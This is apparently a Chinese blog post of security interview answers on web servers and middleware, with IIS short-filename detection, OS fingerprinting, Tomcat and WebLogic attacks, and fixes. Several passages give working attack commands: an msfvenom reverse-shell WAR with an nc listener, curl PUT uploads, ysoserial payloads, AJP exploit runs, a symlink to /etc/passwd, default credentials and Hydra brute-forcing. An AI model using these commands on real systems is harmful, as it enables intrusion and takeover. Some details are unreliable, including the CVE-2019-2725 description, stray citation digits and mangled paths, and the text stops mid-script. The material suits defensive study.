• 2025年最新服务器、中间件安全(面试题)

2025年最新服务器、中间件安全(面试题)

2025-04-26 11:00:22 1 阅读

活动发起人@小虚竹 想对你说:

这是一个以写作博客为目的的创作活动,旨在鼓励大学生博主们挖掘自己的创作潜能,展现自己的写作才华。如果你是一位热爱写作的、想要展现自己创作才华的小伙伴,那么,快来参加吧!我们一起发掘写作的魅力,书写出属于我们的故事。我们诚挚邀请你参加为期14天的创作挑战赛!

提醒:在发布作品前,请将不需要的内容删除。

 

 

 

1.常见的网站服务器容器

一、Web 服务器中间件(处理 HTTP/HTTPS 请求)

1. Nginx
  • 功能:高性能的 HTTP 和反向代理服务器,支持静态资源服务、负载均衡、缓存、SSL/TLS 加密等。
  • 特点
    • 异步非阻塞架构,高并发处理能力(单服务器可支持数万个并发连接);
    • 资源占用低,适合高流量场景(如静态文件、API 接口服务);
    • 常作为反向代理,将请求转发到后端应用服务器(如 Tomcat、Node.js 服务)。
  • 应用场景
    • 静态网站托管(HTML/CSS/JS)、CDN 节点、微服务网关、高并发 API 接口服务。
2. Apache HTTP Server(httpd)
  • 功能:老牌的开源 Web 服务器,支持模块化扩展,如 PHP 解析、Rewrite 规则、虚拟主机等。
  • 特点
    • 兼容性强,支持大量第三方模块(如 mod_php、mod_rewrite);
    • 适合处理动态请求(通过 CGI/FastCGI 与 PHP、Python 等语言集成);
    • 同步阻塞模型,高并发下资源消耗高于 Nginx。
  • 应用场景
    • 传统动态网站(如 WordPress、PHP 项目)、企业内部系统、需要高度定制化模块的场景。
3. Microsoft IIS
  • 功能:Windows 平台的 Web 服务器,支持ASP.NET、ASP、PHP 等技术,集成 IIS 管理器图形化配置。
  • 特点
    • 与 Windows 生态深度整合(如 Active Directory 认证、FTP 服务);
    • 适合.NET 框架应用,支持 URL 重写、SSL 绑定、请求过滤等功能。
  • 应用场景
    • 企业级.NET 应用、政府 / 金融行业的 Windows 环境项目。

二、应用服务器中间件(运行动态应用逻辑)

4. Apache Tomcat
  • 功能:Java 生态的轻量级应用服务器,支持 Servlet、JSP、WebSocket 等 Java EE 规范,不支持 EJB。
  • 特点
    • 轻量高效,适合中小型 Java Web 应用(如 Spring Boot 默认内置 Tomcat);
    • 可作为独立服务器或嵌入到 Spring Boot 项目中运行。
  • 应用场景
    • Java Web 项目部署(如 Spring MVC、Java Servlet 应用)、教育 / 中小型企业项目。
5. WildFly(原 JBoss AS)
  • 功能:全面支持 Java EE 规范(包括 EJB、JPA、JMS 等)的应用服务器,适合复杂企业级应用。
  • 特点
    • 支持热部署、集群管理、分布式事务;
    • 资源消耗较高,适合需要完整 Java EE 功能的场景。
  • 应用场景
    • 大型企业级 Java 应用(如银行核心系统、ERP 平台)。
6. Jetty
  • 功能:Java 生态的轻量级应用服务器,支持嵌入式部署(如在 Java 代码中直接启动 Jetty 实例)。
  • 特点
    • 异步非阻塞模型,适合高并发场景(如 WebSocket 实时通信);
    • 常作为微服务框架(如 Spring Boot、Quarkus)的可选服务器。
  • 应用场景
    • 实时通信应用(聊天、直播)、需要嵌入式部署的 Java 项目。

三、语言特定中间件(针对编程语言 / 框架优化)

7. Node.js HTTP Server
  • 功能:Node.js 内置的 HTTP 服务器模块,基于异步 I/O 模型,适合构建高性能 API 和实时应用。
  • 特点
    • 单线程异步非阻塞,适合 I/O 密集型任务(如 API 网关、实时消息服务);
    • 常配合 Express/Koa 等框架简化开发。
  • 应用场景
    • 前后端分离的 API 服务器、实时聊天应用(Socket.io)、SSR(服务器端渲染)。
8. uWSGI
  • 功能:支持多种语言(Python、Java、Ruby 等)的高性能应用服务器,专注于 WSGI 协议(Python Web 应用接口)。
  • 特点
    • 支持 HTTP、WebSocket、SMTP 等协议,可与 Nginx 配合使用;
    • 适合 Python Web 框架(如 Django、Flask)的生产环境部署。
  • 应用场景
    • Python Web 应用的高性能部署(通过 Nginx + uWSGI 组合)。
9. Gunicorn(Green Unicorn)
  • 功能:Python 专用的 WSGI 服务器,简单高效,支持多工作进程模型。
  • 特点
    • 配置简单,适合快速部署 Flask/Django 应用;
    • 常与 Nginx 结合,由 Nginx 处理静态资源和反向代理。
  • 应用场景
    • 中小型 Python Web 项目的生产环境部署。

四、企业级集成中间件(分布式系统核心)

10. WebLogic Server
  • 功能:Oracle 旗下的 Java EE 应用服务器,提供企业级功能(如集群、负载均衡、安全性、事务管理)。
  • 特点
    • 高度集成企业级解决方案(如与 Oracle 数据库、云服务整合);
    • 适合复杂分布式系统和高可用性要求的场景。
  • 应用场景
    • 大型企业核心业务系统(如电信、金融行业的关键应用)。
11. 消息中间件(非 Web 专用,但核心中间件)
  • RabbitMQ:开源 AMQP 消息队列,支持高可靠消息传递,适合解耦微服务。
  • Kafka:分布式流处理平台,高吞吐量,适合日志处理、实时数据流分析。
  • 应用场景
    • 分布式系统中的异步通信、流量削峰、微服务解耦(如订单系统与库存系统解耦)。
12. API 网关(微服务架构核心)
  • Kong:基于 Nginx 的开源 API 网关,支持 API 路由、限流、认证、监控。
  • Nginx Plus:Nginx 的商业版,内置 API 网关功能,支持动态服务发现。
  • 应用场景
    • 微服务架构中统一管理 API 入口,解决跨服务调用、权限控制等问题。

五、选择建议

  • 静态 / 高并发场景:Nginx(高性能、低资源消耗);
  • 传统动态网站(PHP/ASP.NET:Apache HTTP Server(模块化强)或 IIS(Windows 生态);
  • Java Web 应用
    • 中小型项目:Tomcat(轻量)或 Jetty(嵌入式);
    • 企业级项目:WildFly/WebLogic(完整 Java EE 支持);
  • Python 项目:Gunicorn/uWSGI + Nginx(高效部署 WSGI 应用);
  • 微服务 / 分布式系统:API 网关(Kong/Nginx Plus)+ 消息中间件(Kafka/RabbitMQ)。


 

中间件的核心价值在于屏蔽底层复杂性,提供标准化服务(如网络通信、资源管理、安全认证),选择时需结合技术栈、性能需求、系统规模(单体应用 / 分布式)及生态兼容性(如 Java 项目优先选 Tomcat,Python 优先选 uWSGI)。

2.如何检测iis短文件名漏洞

IIS 短文件名漏洞(8.3 文件名漏洞)源于 Windows 系统对旧版 8.3 文件名格式的兼容机制,当 IIS 服务器启用短文件名解析时,攻击者可通过构造带有~1后缀的 URL 尝试获取文件 / 目录的短名称,进而可能导致路径遍历、敏感文件泄露等风险。以下是具体的检测方法:

一、漏洞原理

Windows 系统会为长文件名自动生成短文件名(格式为前6个字符~1.扩展名,如longfilename.txt生成longfi~1.txt)。若 IIS 未禁用短文件名解析,攻击者可通过发送包含~1的 URL,探测是否存在对应的短文件名,从而推断服务器上的文件 / 目录结构。

二、检测前提

  1. 目标服务器使用 Windows 系统 + IIS Web 服务器(通常为 IIS 6.0 及以下版本,IIS 7.0 + 默认禁用短文件名,但配置不当仍可能存在)。
  2. 已知或可猜测文件 / 目录的 前 6 个字符(或通过枚举尝试)。

三、手动检测方法

1. 通过浏览器 /curl 发送探测请求

构造包含~1后缀的 URL,观察响应状态码或内容:


 

  • 格式http://目标IP或域名/[文件/目录名前6位]~1/[后缀]
  • 示例
    • 探测目录短名称:http://example.com/testdir~1/(假设真实目录名为testdirectory,前 6 位为testdi,短名称为testdi~1)。
    • 探测文件短名称:http://example.com/longfile~1.txt(假设真实文件名为longfilename.txt,短名称为longfi~1.txt)。
  • 响应分析
    • 若返回 200 OK403 Forbidden(非 404),说明短文件名存在,漏洞可能存在。
    • 若返回 404 Not Found,可能不存在短文件名或路径错误。
2. 利用目录遍历和通配符
  • 通过*~1*通配符尝试匹配短文件名(需 IIS 开启目录浏览):
    http://example.com/*~1*/
    若返回目录列表,可能包含短文件名信息。

四、工具检测方法

1. 使用扫描工具
  • DirBuster(Java 开源工具):
    • 在字典中添加包含~1的短文件名规则(如?d?d?d?d?d~1?代表任意字符),扫描目标目录。
    • 配置示例:字典文件中加入test~1user~1等可能的短名称,结合目标已知信息定向扫描。
  • 御剑 Web 扫描器(国产工具):
    • 在 “目录扫描” 模块中,勾选 “检测短文件名漏洞” 选项,自动生成带~1的探测路径。
  • Python 脚本自定义探测python
import requests

target = "http://example.com/"
prefix = "test"  # 假设目录/文件前6位为test(不足6位补全)
for i in range(1, 10):
    url = f"{target}{prefix}~{i}/"
    response = requests.get(url)
    if response.status_code != 404:
        print(f"短文件名存在: {url} 状态码: {response.status_code}")


 

2. 漏洞利用工具(需授权环境)
  • Metasploit 模块
    使用auxiliary/scanner/http/iis_shortname_scanner模块,指定目标 IP 范围和目录前缀,自动探测短文件名。

五、漏洞修复建议

  1. 禁用短文件名解析(根本修复)
    • 通过 注册表编辑器regedit)修改:
      定位到 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlFileSystem,将NtfsDisable8dot3NameCreation的值设置为 1(1 = 禁用,0 = 启用),重启服务器生效。
    • 注意:此设置会影响所有依赖 8.3 文件名的程序,需确认业务兼容性。
  1. 限制 IIS 目录访问
    • 关闭 IIS 的目录浏览功能,避免攻击者通过目录列表获取线索。
    • 在 IIS 中为敏感目录设置访问权限,拒绝匿名用户访问。
  1. 更新 IIS 版本
    • IIS 7.0 及以上版本默认禁用短文件名解析,但需检查配置是否被手动启用(通过%systemroot%system32inetsrvconfigpplicationHost.config文件,搜索enable83Name相关配置)。

六、注意事项

  • 合法授权:检测需在目标所有者授权下进行,避免触犯法律。
  • 误报可能:部分服务器即使禁用短文件名,可能因缓存或旧配置返回非 404 状态码,需结合多种方法验证。
  • 结合业务场景:若业务必须使用 8.3 文件名(极少情况),需通过防火墙或 WAF(如 ModSecurity)拦截包含~1的请求。


 

通过以上方法可有效检测 IIS 短文件名漏洞,修复时需优先禁用 8.3 文件名生成,从源头杜绝风险。

3.如何判断web服务器是windows还是linux

一、通过 URL 路径格式判断(最直接)

1. 文件路径分隔符
  • Windows 特征:若服务器返回的错误信息或文件路径包含 反斜杠(,如 C:inetpubwwwrooterror.html,则为 Windows 系统。
  • Linux 特征:路径使用 正斜杠(/,如 /var/www/html/index.php
  • 操作方法
    故意访问不存在的文件(如 http://域名/abcde123456789),查看返回的错误页面或响应体,若包含路径信息,直接判断分隔符类型。
2. 短文件名漏洞(Windows 特有)

尝试访问带 ~1 后缀的 URL(如 http://域名/test~1/),若返回 403 Forbidden200 OK(非 404),说明存在 Windows 的 8.3 短文件名机制(详见之前 IIS 漏洞检测部分)。

二、通过 HTTP 响应头判断

1. Server 字段分析

使用工具(如浏览器 F12、curlwget)获取响应头,重点查看 Server 字段:


 

  • Windows 典型值
    • Microsoft-IIS/10.0(IIS 服务器)
    • Microsoft-HTTPAPI/2.0(Windows 内置 API)
  • Linux 典型值
    • Apache/2.4.57 (Ubuntu)
    • Nginx/1.24.0
    • openresty/1.21.4.1(Nginx 衍生版)
2. X-Powered-By 或其他字段
  • 若存在 .NET 相关信息(如 X-Powered-By: ASP.NET),大概率为 Windows(因ASP.NET仅 Windows 原生支持)。
  • 若包含 PHP/7.4.30Python 等,可能为 Linux,但需结合其他条件(Windows 也可运行 PHP,但较少见)。

三、通过服务器软件与技术栈判断

1. 默认端口与服务
  • Windows 常见组合
    • IIS 服务器(默认端口 80/443,支持 ASP/ASPX)
    • 结合.NET 框架、Windows 身份验证(NTLM/Kerberos)。
  • Linux 常见组合
    • Apache/Nginx(默认端口 80/443,支持 PHP/Python/Node.js)
    • 结合 MySQL/PostgreSQL 数据库、SSH 远程管理。
2. 文件扩展名支持
  • 若访问 .aspx 文件返回正常页面(非 404),基本确定为 Windows(IIS+ASP.NET)。
  • .php 文件正常解析,可能为 Linux(但 Windows+IIS+PHP 也存在,需结合其他条件)。

四、通过错误页面特征判断

1. Windows IIS 错误页面
  • 经典错误码页面(如 404、500)可能包含 “HTTP 错误” 字样,页面设计偏微软风格,路径可能带反斜杠。
  • 示例:plaintext
HTTP 错误 404.0 - Not Found  
无法找到请求的资源。  
物理路径:C:inetpubwwwrootmissing.aspx


 

2. Linux Apache/Nginx 错误页面
  • 错误页面通常更简洁,路径为正斜杠,可能包含服务器软件版本(如 “Apache/2.4.29 Server at example.com Port 80”)。
  • 示例:plaintext
Not Found  
The requested resource /abc was not found on this server.  
Apache/2.4.29 (Ubuntu) Server at example.com Port 80


 

五、通过命令执行(需有权限)

若能通过漏洞(如命令注入)执行系统命令:


 

  • Windows:执行 echo %OS% 返回 Windows_NT,或 systeminfo 查看系统类型。
  • Linux:执行 uname -a 返回 Linux 内核信息(如Linux server 5.4.0-107-generic #121-Ubuntu SMP),或 cat /etc/os-release 查看发行版。

六、通过工具快速检测

1. Nmap 脚本扫描

使用 Nmap 的 HTTP 指纹脚本:


 

bash

nmap -sV --script http-system-detection 目标IP


 

输出会显示操作系统猜测(如Running: Microsoft Windows Server 2016|2019Linux 3.10 - 5.4)。

2. WhatWeb 工具

开源指纹识别工具,支持精准识别操作系统:


 

bash

whatweb http://目标域名


 

结果示例:


 

plaintext

[http://example.com]  
OS: Windows Server 2019  
Server: Microsoft-IIS/10.0

3. 在线工具
  • Wappalyzer(浏览器插件或在线版):检测技术栈的同时,显示操作系统。
  • Netcraft:查看 “Server” 信息,标注 Windows/Linux。

七.大小写

Windows对于大小写不敏感,替换某个字母为大写返回正常为Windows,反之为linux

八.TTL返回值

TTL为64,有很大可能性为linux,TTL为128,有很大可能性为Windows,TTL为255,有很大可能为UNIX(可修改TTL)

总结:判断流程

  1. 优先看路径分隔符:反斜杠→Windows,正斜杠→Linux(最可靠)。
  2. 其次看 Server 头:包含 “IIS” 或 “Microsoft”→Windows,包含 “Apache/Nginx”→Linux(需结合其他条件,因 Nginx/Apache 可跨平台)。
  3. 结合技术栈:ASPX→Windows,PHP/Python→大概率 Linux(非绝对)。
  4. 工具辅助:Nmap/WhatWeb 直接获取系统指纹,准确率高。


 

通过以上方法综合判断,可在无权限的情况下快速区分 Web 服务器的操作系统。

4.Tomcat漏洞利用

一、弱口令攻击

漏洞原理

Tomcat 管理后台(如/manager/html)默认配置存在弱口令(如admin:admin),攻击者可通过爆破或默认凭证登录,上传恶意 WAR 包获取服务器权限。

利用方法
  1. 爆破工具
    • Burp Suite:抓取登录请求,使用字典爆破Authorization字段的 Base64 编码值(如admin:admin编码为YWRtaW46YWRtaW4=)。
    • Metasploitbash
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 目标IP
set USER_FILE 用户名文件
set PASS_FILE 密码文件
run


 

  1. 手动验证
    访问http://目标IP:8080/manager/html,尝试默认用户名密码(如tomcat:tomcat)。
实战案例
  • 上传 WAR 包:登录后通过部署WAR文件功能上传包含 JSP 后门的 WAR 包(如msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=8081 -f war -o shell.war)。
  • 反弹 Shell:访问http://目标IP:8080/shell/触发后门,本地监听端口接收连接:bash
nc -lvnp 8081


 

二、文件上传漏洞(CVE-2017-12615)

漏洞原理

Tomcat 的DefaultServlet在处理 PUT 请求时,若配置readonly=false(非默认),攻击者可通过构造特殊文件名(如shell.jsp/)绕过 JSP 文件检测,直接上传恶意代码。

利用条件
  • Tomcat 版本为 7.0.0-7.0.79(8.0 及以上默认修复)。
  • conf/web.xmlDefaultServletreadonly参数设置为false
利用方法
  1. 构造 PUT 请求bash
curl -X PUT "http://目标IP:8080/shell.jsp/" --data-binary @shell.jsp


关键技巧

    • 文件名后加/或空格(如shell.jsp/),绕过 Tomcat 对 JSP 文件的过滤。
    • 若为 Windows 系统,可使用::$DATA后缀(如shell.jsp::$DATA)。
  1. 验证上传
    访问http://目标IP:8080/shell.jsp,若返回 200 OK,说明漏洞存在。
工具辅助
  • TomcatScanPro:集成 CVE-2017-12615 检测模块,支持多线程扫描和漏洞利用。bash
python3 TomcatScanPro.py -u http://目标IP:8080 -m cve-2017-12615


 

三、反序列化漏洞(CVE-2020-9484/CVE-2025-24813)

漏洞原理
  • CVE-2020-9484:Tomcat 的FileStore会话持久化功能未正确验证文件路径,攻击者可通过构造特制请求读取或写入任意文件,结合反序列化链执行代码。
  • CVE-2025-24813:Tomcat 处理不完整 PUT 请求时,允许上传恶意序列化数据到会话文件,触发反序列化漏洞。
利用条件
  • 启用FileStore会话存储(conf/context.xml中配置)。
  • 存在可利用的反序列化链(如commons-collections库)。
利用方法
  1. 构造恶意会话文件
    使用ysoserial生成反序列化 payload:bash
java -jar ysoserial.jar CommonsCollections1 "touch /tmp/success" > payload.session


 

  1. 上传并触发
    通过 PUT 请求上传payload.session到会话存储目录(如/work/Catalina/localhost/ROOT/),并访问对应会话 ID:bash
curl -X PUT "http://目标IP:8080/../../work/Catalina/localhost/ROOT/sess_恶意ID.session" --data-binary @payload.session


 

修复建议
  • 禁用FileStore会话存储,改用内存或其他安全存储方式。
  • 删除commons-collections等危险库,或升级到安全版本。

四、AJP 协议文件包含漏洞(CVE-2020-1938)

漏洞原理

Tomcat 的 AJP 连接器存在缺陷,攻击者可通过构造特定请求读取服务器webapp目录下的任意文件(如/WEB-INF/web.xml),若结合文件上传功能可进一步执行代码。

利用条件
  • AJP 连接器未禁用(默认端口 8009)。
  • 目标服务器允许文件上传。
利用方法
  1. 读取文件
    使用 Python 脚本(如CVE-2020-1938-Tomact-file_include-file_read):bash
python2 exploit.py -p 8009 -f /WEB-INF/web.xml 目标IP


 

  1. 结合文件上传
    • 上传恶意 JSP 文件到webapp目录。
    • 通过 AJP 协议包含该文件:bash
python2 exploit.py -p 8009 -f /上传路径/shell.jsp 目标IP


 

防御措施
  • 禁用 AJP 连接器(修改conf/server.xml,注释)。
  • 配置防火墙限制 AJP 端口(8009)的访问。

五、本地提权漏洞(CVE-2016-1240)

漏洞原理

Tomcat 服务启动脚本以 root 权限运行,但日志文件catalina.out的所有者为 tomcat 用户。攻击者可通过创建软链接,将catalina.out指向敏感文件(如/etc/passwd),触发 root 权限写入。

利用步骤
  1. 获取低权限 Shell:通过其他漏洞(如弱口令)上传 JSP 后门,获取tomcat用户权限。
  2. 创建软链接bash
ln -s /etc/passwd /var/log/tomcat7/catalina.out


 

  1. 触发提权:重启 Tomcat 服务,root 用户会将catalina.out的所有者改为tomcat,从而修改/etc/passwd文件。

六、检测与修复

漏洞检测
  1. 工具扫描
    • Nmapbash
nmap -p 8080 --script http-tomcat-version 目标IP


 

    • TomcatScanPro:一键检测弱口令、文件上传、AJP 漏洞等。
    • WhatWeb:识别 Tomcat 版本及技术栈。
  1. 配置检查
    • 检查conf/web.xmlDefaultServletreadonly参数是否为true
    • 确认 AJP 连接器是否禁用(conf/server.xml中无AJP配置)。
修复方案
  1. 更新版本
    • 升级到 Tomcat 9.0.31(CVE-2020-1938)、9.0.98(CVE-2024-50379)等安全版本。
    • 参考官方公告:Apache Tomcat Security Advisory。
  1. 禁用危险功能
    • 关闭 PUT 方法:在conf/web.xml中设置readonly=true
    • 禁用 AJP 连接器:注释server.xml中的 AJP 配置。
  1. 强化认证
    • 修改管理后台默认密码,使用强密码策略。
    • 限制管理后台访问 IP(在conf/tomcat-users.xml中配置role权限)。
  1. 安全配置
    • 以低权限用户(非 root)运行 Tomcat。
    • 禁用目录浏览,删除示例应用(如/examples)。

七、防御案例

某企业 Tomcat 服务器被攻击后,通过以下措施修复:


 

  1. 漏洞分析:攻击者利用 CVE-2017-12615 上传 JSP 后门,结合弱口令进入管理后台。
  2. 紧急处理
    • 关闭 PUT 方法(readonly=true)。
    • 修改admin用户密码,禁用匿名访问。
  1. 长期防护
    • 升级 Tomcat 到 9.0.31,禁用 AJP 连接器。
    • 部署 WAF,拦截包含~1/WEB-INF/等敏感字符串的请求。

总结

Tomcat 漏洞利用需结合 版本分析、配置检查、工具扫描 多维度防御。核心防护策略包括:


 

  • 禁用非必要功能(PUT 方法、AJP 协议、目录浏览)。
  • 及时更新补丁,避免使用老旧版本。
  • 强化认证与访问控制,限制管理后台权限。
  • 监控异常请求,通过日志分析发现攻击痕迹。


 

通过以上措施可大幅降低 Tomcat 服务器的安全风险。

5.Weblogic后台默认密码

一、各版本默认密码与验证方法

1. WebLogic 10.x(如 10.3.6)
  • 默认用户名weblogic
  • 默认密码
    • 独立安装版weblogic123(需验证)。
    • JDeveloper 自带版weblogic1(因密码复杂度要求,文档描述为welcome1但实际为weblogic1)。
  • 验证方式
    • 访问控制台http://IP:7001/console,尝试默认凭证。
    • 若失败,检查安装日志或boot.properties文件(路径:DOMAIN_HOME/servers/AdminServer/security/boot.properties)。
2. WebLogic 12c(如 12.2.1.4)
  • 默认用户名weblogic
  • 默认密码
    • Docker 镜像Oracle@123(如 VulnStack 环境)。
    • 手动安装:无默认密码,需在安装时设置(密码需包含数字和字母,至少 8 位)。
  • 验证方式
    • 若为 Docker 部署,查看容器日志获取密码:bash
docker logs weblogic-container | grep 'Initial default password'


 

3. WebLogic 14c(如 14.1.1.0)
  • 默认用户名weblogic
  • 默认密码:无,安装时强制设置(参考11)。
  • 验证方式
    • 若通过 Oracle 云市场部署,需参考官方文档(Doc ID 2267270.1)获取默认密码。
4. 其他常见弱密码
  • 通用弱口令plaintext
weblogic/weblogic  
weblogic/welcome1  
weblogic/Oracle@123  
system/manager  
wlcsystem/wlcsystem


 

  • 来源
    • 历史版本默认配置(如 WebLogic 8.1)。
    • 用户未修改的默认凭证(如wlcsystem为系统用户)。

二、实战验证与密码恢复

1. 手动验证
  • 场景:已知目标 IP 和端口,尝试默认密码登录。
  • 步骤
    1. 访问http://IP:7001/console
    2. 输入weblogic和常见密码(如weblogic123Oracle@123)。
    3. 若失败,检查boot.properties文件(需服务器权限)。
2. 密码恢复方法
  • 方法 1:修改配置文件(需服务器权限)
    1. 停止 WebLogic 服务。
    2. 编辑DOMAIN_HOME/security/SerializedSystemIni.dat文件,删除密码加密部分。
    3. 启动服务,使用空密码登录并重置。
    • 风险:可能导致域配置损坏,需备份文件。
  • 方法 2:使用工具重置(适用于 10.x 版本)bash
# 生成新密码文件
java weblogic.security.utils.AdminAccount <新用户名> <新密码> .
# 替换原文件
cp DefaultAuthenticatorInit.ldift DOMAIN_HOME/security/


 

    • 参考:19。
3. 爆破工具
  • 工具
    • Burp Suite:抓取登录请求,使用字典爆破。
    • Metasploitbash
use auxiliary/scanner/http/weblogic_login
set RHOSTS 目标IP
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
run


 

    • Hydrabash
hydra -L users.txt -P passwords.txt -s 7001 目标IP http-form-post "/console/j_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password"


 

三、安全风险与防御建议

1. 风险分析
  • 远程代码执行:弱密码登录后,可上传恶意 WAR 包(如msfvenom -p java/jsp_shell_reverse_tcp ...)。
  • 敏感信息泄露:通过控制台可查看数据库连接字符串、应用配置等。
  • 横向渗透:若 WebLogic 与其他系统(如数据库)共享凭证,可能导致连锁攻击。
2. 防御措施
  1. 禁用默认凭证
    • 删除weblogic用户,创建强密码的新管理员。
    • 参考8:在控制台修改密码,路径:Security Realm > Users > weblogic > Change Password
  1. 强化密码策略
    • 密码长度≥12 位,包含大小写字母、数字、特殊字符。
    • 启用密码复杂度检查(控制台路径:Security Realm > Providers > Password Validation)。
  1. 限制访问权限
    • 仅允许内部网络访问控制台(如通过防火墙限制)。
    • 禁用非必要服务(如 T3 协议、IIOP 协议)。
  1. 及时更新补丁
    • 修复 CVE-2023-21839(反序列化漏洞)、CVE-2024-29063(SSRF 漏洞)等。
    • 参考 Oracle 官方公告:WebLogic Security Alerts。
  1. 监控与审计
    • 记录登录失败日志,设置登录失败锁定阈值(如 5 次失败后锁定账户)。
    • 使用 WAF 拦截包含weblogicconsole等关键词的请求。

四、实战案例与防御效果

案例 1:Docker 环境弱密码攻击
  • 攻击步骤
    1. 部署 VulnStack 的 WebLogic 环境(默认密码weblogic/Oracle@123)。
    2. 登录控制台,上传 JSP 后门(如shell.jsp)。
    3. 访问http://IP:7001/shell.jsp触发反弹 Shell。
  • 防御措施
    • 自定义 Docker 镜像,删除默认用户。
    • 使用docker-compose.yml配置时,通过环境变量设置密码:yaml
environment:
  - USER_MEM_ARGS=-Dweblogic.management.username=admin -Dweblogic.management.password=StrongPass123!


 

案例 2:生产环境密码恢复
  • 场景:忘记 WebLogic 密码,无法登录控制台。
  • 解决方案
    1. 停止服务,备份DOMAIN_HOME
    2. 使用SerializedSystemIni.dat重置密码(参考19)。
    3. 启动服务后,立即修改密码并删除临时文件。

五、总结

  • 默认密码不可信:WebLogic 的默认密码因版本和部署方式差异较大,且存在安全风险,必须在安装后立即修改。
  • 防御核心
    • 禁用默认用户,创建强密码的新管理员。
    • 限制控制台访问,仅允许可信 IP 地址连接。
    • 定期审计,检查是否存在弱密码或未授权用户。


 

通过以上措施,可有效降低 WebLogic 后台的安全风险。

6.Weblogic的CVE-2019-2725漏洞描述于修复方案

漏洞描述

1. 漏洞概述

CVE - 2019 - 2725 是 WebLogic Server 中存在的一个严重的反序列化漏洞。WebLogic 是 Oracle 公司开发的一款应用服务器,在企业级应用开发和部署中广泛使用。此漏洞允许未经身份验证的远程攻击者通过构造恶意请求,利用 WebLogic Server 的 T3 协议进行远程代码执行攻击。

2. 影响版本

此漏洞影响多个 WebLogic Server 版本,主要包括:


 

  • WebLogic Server 10.3.6.0
  • WebLogic Server 12.1.3.0
  • WebLogic Server 12.2.1.3
  • WebLogic Server 12.2.1.4
3. 漏洞原理

WebLogic Server 使用 T3 协议进行内部通信和管理,T3 协议在处理序列化对象时存在缺陷。攻击者可以构造包含恶意代码的序列化对象,通过 T3 协议发送到 WebLogic Server。当服务器对这些恶意序列化对象进行反序列化操作时,就会触发恶意代码的执行,从而使攻击者能够在目标服务器上执行任意代码。

4. 攻击场景

攻击者可以利用该漏洞在未授权的情况下,远程控制 WebLogic Server,进行诸如窃取敏感信息、安装后门程序、破坏系统等恶意操作。例如,攻击者可以获取数据库连接信息,进而访问企业的核心数据;或者植入挖矿程序,利用服务器的计算资源进行加密货币挖掘。

修复方案

1. 升级 WebLogic Server 版本

Oracle 官方发布了补丁来修复此漏洞,建议受影响的用户尽快将 WebLogic Server 升级到安全版本:


 

  • WebLogic Server 10.3.6.0 用户,升级到 10.3.6.0.190416 及以上版本。
  • WebLogic Server 12.1.3.0 用户,升级到 12.1.3.0.190416 及以上版本。
  • WebLogic Server 12.2.1.3 用户,升级到 12.2.1.3.190416 及以上版本。
  • WebLogic Server 12.2.1.4 用户,升级到 12.2.1.4.190416 及以上版本。


 

升级步骤如下:


 

  • 备份 WebLogic Server 的配置文件、域目录以及相关数据,防止升级过程中数据丢失。
  • 下载对应版本的补丁包,可从 Oracle 官方支持网站获取。
  • 停止 WebLogic Server 服务。
  • 运行补丁安装程序,按照提示完成升级操作。
  • 启动 WebLogic Server 服务,并验证升级是否成功。
2. 配置防火墙规则

如果暂时无法进行升级,可以通过配置防火墙规则来限制对 WebLogic Server T3 协议端口(默认是 7001)的访问,只允许来自可信 IP 地址的连接。具体配置步骤因使用的防火墙不同而有所差异,以下是一个示例(以 Linux 系统的 iptables 为例):


 

bash

# 允许本地回环接口的流量
iptables -A INPUT -i lo -j ACCEPT

# 允许已建立的和相关的连接
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

# 允许来自可信IP地址的T3协议流量
iptables -A INPUT -p tcp -s 可信IP地址 -dport 7001 -j ACCEPT

# 拒绝其他所有对T3协议端口的访问
iptables -A INPUT -p tcp --dport 7001 -j DROP

3. 监控和检测

部署入侵检测系统(IDS)或入侵防御系统(IPS),对 WebLogic Server 的网络流量进行实时监控和检测。这些系统可以识别和拦截异常的 T3 协议流量,以及可能利用该漏洞的恶意请求。同时,定期审查 WebLogic Server 的日志文件,查看是否存在异常的登录尝试、错误信息或可疑操作记录,及时发现潜在的攻击行为。

7.假设你发现weblogic爆发0day漏洞,需要你紧急排查影响,说说你的看法

一、漏洞特征快速定位

  1. 确认攻击向量
    • T3 协议漏洞:通过nmap -p 7001 --script weblogic-t3-info 检测 T3 服务是否开放。若存在反序列化漏洞(如 CVE-2019-2725 补丁绕过),攻击者可直接构造恶意 T3 协议数据执行代码618。
    • HTTP 协议漏洞:访问http://IP:7001/_async/AsyncResponseService,若返回 200 状态码,说明存在 wls9-async 组件漏洞19。此组件在 WebLogic 10.3.6/12.1.3 中默认启用,攻击者可通过 HTTP 请求触发反序列化1217。
  1. 版本与组件关联
    • 受影响版本
      • T3 漏洞:WebLogic 10.3.6.0 + JDK1.7 以下版本6。
      • HTTP 漏洞:WebLogic 10.3.6.0、12.1.3.0、12.2.1.11214。
    • 关键组件
      • wls9_async_response.war(路径:DOMAIN_HOME/servers/AdminServer/tmp/_WL_user/wls9_async_response)。
      • wls-wsat.war(路径:DOMAIN_HOME/servers/AdminServer/tmp/_WL_user/wls-wsat)。
    • 验证方法:通过find / -name "wls9_async_response.war"find / -name "wls-wsat.war"定位组件是否存在1617。

二、紧急隔离与风险阻断

  1. 网络层隔离
    • 防火墙策略
      • 禁用 T3 协议:iptables -A INPUT -p tcp --dport 7001 -j DROP
      • 限制 HTTP 访问:仅允许可信 IP 访问 WebLogic 控制台(如iptables -A INPUT -s 192.168.1.0/24 -p tcp --dport 7001 -j ACCEPT)18。
    • WAF 规则
      • 拦截/_async/*/wls-wsat/*路径:bash
# 华为云WAF配置示例
路径包含 "/_async" 或 "/wls-wsat" → 阻断


参考2122。

  1. 服务层禁用
    • WebLogic 控制台配置
      1. 进入Security Realm > Providers > Network Access,添加连接筛选器:plaintext
weblogic.security.net.ConnectionFilterImpl
* * 7001 deny t3 t3s


 

      1. 重启服务使配置生效18。
    • 删除高危组件(需开发确认业务影响):bash
rm -rf DOMAIN_HOME/servers/AdminServer/tmp/_WL_user/wls9_async_response
rm -rf DOMAIN_HOME/servers/AdminServer/tmp/_WL_user/wls-wsat


参考1217。

三、漏洞验证与影响评估

  1. 自动化扫描
    • Nessus 插件:使用WebLogic T3 Deserialization (CVE-2019-2725)插件检测。
    • PoC 验证python
# 测试wls9-async漏洞
import requests
url = "http://IP:7001/_async/AsyncResponseService"
